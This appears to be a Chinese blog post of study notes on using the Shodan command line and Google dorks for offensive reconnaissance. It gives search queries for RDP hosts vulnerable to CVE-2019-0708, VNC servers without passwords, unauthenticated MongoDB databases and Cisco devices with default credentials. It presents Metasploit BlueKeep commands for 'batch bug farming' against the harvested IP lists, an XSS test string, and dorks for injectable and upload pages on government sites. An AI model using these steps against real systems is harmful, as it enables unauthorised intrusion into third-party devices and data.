admin 管理员组

文章数量: 887007

目录

 

前言

shodan(1)

shodan(2)

shodan(3)

shodan(4)

shodan(5)

shodan(6)

shodan(7)

Google搜索


 

前言

        Shodan是一个专注于搜索互联网设备和服务的搜索引擎。首先需要安装kail虚拟机,使用管理员(root)身份登录。

shodan(1)

        首先安装shodan,打开kail的终端,输入以下指令

克隆shodan

git clone https://github/achillean/shodan-python.git

切换到shodan-python文件夹

cd shodan-python

安装

python setup.py install

初始化shodan,api_key为自己的shodan账户的会员密钥,可以去闲鱼买一个账号使用

shodan init api_key

shodan -h (查看使用帮助文档)

测试一下,寻找ip地址

shodan search —limit 10 country:jp

shodan search --limit 10 --fields ip country:jp

shodan search --limit 10 --fields ip,post country:jp (返回数字ip地址)

shodan search --limit 10 --fields ip_str country:jp (扫出来ip地址)

shodan search --cilor --limit 10 --fields ip_str port:3389 country:cn city:shenzhen

国别地区  country:cn

城市信息  city:shenzhen

端口  port:3389

查看ip信息  shodan host ip

过滤ip信息  --fields ip_str,port

显示信息数量  --limit 10

深色表示  --cilor

操作系统  os:windows7

漏洞  has_vuln:True

设备:摄像头  device:webcam

设备:路由器  device:router

web端的一些设备  tp-link

 

shodan(2)

查找cve-2019-0708的漏洞

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' 十六机制字符串(类似于指纹的方式去寻找)

弱口令 Administrator &Administrator

metasploit 去进行批量的漏洞利用,msfconsole ,

search 0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

show options

set rhosts file:拖入IP地址文件

check

攻击不成功,首先 show options ,看清我们的这个payload,ip端口 要填对,在一个就是show targets 它支持windows7,sever这种,你得把targets设置正确

download参数

shodan download -h (查看帮助文档)

shodan download 0708 --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' (删掉过滤信息)

parse参数

shodan parse -h (查看帮助文档)

shodan parse --fields ip_str 0708

这是批量刷漏洞的姿势

shodan search vuln:cve-2019-0708 这种可能需要更高级别的账号,我们换种方式照样绕过它去批量刷洞

 

 

shodan(3)

shodan count '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

数据库里面大概存在这么多条与这个漏洞相关的东西

shodan honeyscore ip地址 可以自动判断它是不是蜜罐

可以到 https://honeyscore.shodan.io/ 网页端直接搜索

https://honeyscore.shodan.io/https://honeyscore.shodan.io/

利用shodan 查看IP地址的历史数据

shodan host ip --history

ping 网址获取ip地址

vnc空密码

shodan search --limit 30 --fields ip_str "authentication disabled" port:5900

shodan download --limit 30 --fields ip_str "authentication disabled" port:5900

shodan parse --fields ip_str 文件包>vnc.txt

 

shodan(4)

今天搜一些路由器交换机,以及其他的一些信息。

 shodan myip (查看自己的出口IP,哪个地址链接的公网)

可以利用shodan查看一下哪些网站已经被黑了。

shodan search --limit 10 --fields ip_str,port http.title:hacked by

shodan search --limit 10 --fields ip_str,port http.title:hacked by country:cn city:beijing

title关键字还能搜一些其他的网站,比如棋牌、后台、mysql  等等

 

接下来去搜一些弱口令设备,比如思科、路由器等等

shodan  search --limit 10 --fields ip_str,port "cisco -authorired port:23"

 弱口令 :

username:cisco /  admin

password: cisco

 

 

 

shodan(5)

利用shodan搜索网段

nsa ip address range

美国安全局官方网站  www.nsa.gov

shodan search --limit 10 --fields ip_str,port net:208.88.84.0/24

美国国家安全局的一个网段

shodan search --limit 10 --fields ip_str,port org:nsa.gov

搜索一些组织的IP地址

shodan search --limit 10 --fields ip_str,port hostname:google

找一些网址所在组织的IP地址

shodan search --limit 10 --fields ip_str,port country:cn http.waf:safedog

查找一些安装了安全狗waf的网站

验证:网址后加<script>alert("xss")</script>

shodan search --limit 10 --fields ip_str,port country:cn http.html:login

检索html前端页面中带有关键字的IP地址,和title类似

shodan search --limit 10 --fields ip_str "Mongodb server information -authentication" port:27017

搜Mongodb未授权登录 数据库 mongodb自己下载 未授权的一般能够直接链接数据库

jenkins  组件,可以搜索了解使用

shodan search --limit 10 --fields ip_str " X-Jenkins " OR "Set-cookie:JSESSIONID" http.title:"Dashboard"  

 

shodan(6)

接下来了解shodan的图形化界面,前面都是学习命令行。

首先打开他们的官方网站,比如拿0708举例

'"\x03\x00\x00\x0b\x06\xd0\x00\x124\x00"'

直接在搜索框里搜索和命令行里面搜search是一摸一样的

搜索webcam  (摄像头的信息)

 

monitor (shodan的一个模块,用来监控网站ip使用的),学术会员可以监控大约16个IP地址

mange(资产管理 添加要监控的网站ip)

settings (设置通知邮件)

dashboard (现有监控的一些信息 端口 漏洞 ip地址(存在cdn就会有多个地址))

shodan search --limit 10 --fields ip_str,port product:Apache httpd

shodan search --limit 10 --fields ip_str,port org:Tencent cloud

 

shodan(7)

shodan的其他命令参数:

alert 

shodan alert -h

查看帮助文档,这个讲的是怎么去配置ip监控,我们能在web页面上面去做

info

shodan info

查看你查询的 扫面的一些次数

domain

shodan domain

查看域名信息,有很多的查询域名的工具,不一定要用shodan

比如shodan是非实时工具,可能我们扫描的一个ip地址的信息是几个月之前的

我们如果要用shodan去实时的扫描,再用scan扫描一下就行了

scan

shodan scan -h

查看帮助文档

shodan scan submit ip地址

shodan scan list  查看扫描信息

shodan stats --facets ssl.version country:cn has_ssl:true http

统计中国使用了ssl的ip,并用版本做一个统计

 

 

注意学习各种参数的组合,国家地区、漏洞、版本、ip等等的一系列参数配合起来

结合port 端口对应的服务去搜

mysql:3306

80 - HTTP

443 - HTTPS

21 - FTP

22 - SSH

25 - SMTP

110 - POP3

143 - IMAP

53 - DNS

3306 - MySQL数据库服务器

5432 - PostgreSQL数据库服务器

3389 - 远程桌面协议(RDP)

69 - TFTP

137-139 - NetBIOS端口

67-68 - DHCP 

截图搜索参数 has_screenshot:true cisco

 

 

 

Google搜索

"inurl:admin":查看包含"admin"的网页URL,可能找到管理后台入口

"inurl:login":查看包含"login"的登录页面

"inurl:php?id=":查看可能存在SQL注入漏洞的PHP页面

"inurl:asp?id=":查看可能存在SQL注入漏洞的ASP页面

"inurl:jsp?id=":查看可能存在SQL注入漏洞的JSP页面

"filetype:pdf 关键词":查看特定关键词的PDF文件

"filetype:doc 关键词":查看特定关键词的Word文档

"filetype:xls 关键词":查看特定关键词的Excel表格

"intitle:  后台管理":查找标题中包含“后台管理”的网页

"intitle:  登陆页面":查找标题中包含“登陆页面”的网页

"site:gov inurl:upload":在政府网站中查找可能存在文件上传漏洞的页面

"site:edu inurl:forum":在教育机构网站中查找论坛页面

"site:com inurl:phpmyadmin":在商业网站中查找可能存在phpMyAdmin管理页面

"site:org inurl:password":在非营利组织网站中查找可能包含“password”的页面,可能找到泄露的密码信息

"site:net inurl:backup":在 域名网站中查找备份文件

"site:gov intitle:敏感信息":在政府中文域名网站中查找标题包含敏感信息的页面

"site:company inurl:confidential":在特定公司网站中查找包含”confidential“(机密)的页面

"site:domain inurl:uploads":在特定域名网站中查找上传文件的目录

"site:edu filetype:ppt 关键词":在教育机构中文域名网站中查找特定关键词的ppt文件

"site:*.gov inurl:vulnerability":在各种政府网站中查找包含"vulnerability"(漏洞)的页面

 

 

 

 

 

 

 

 

 

 

 

 

 

本文标签: 学习笔记 shodan Sec 泷羽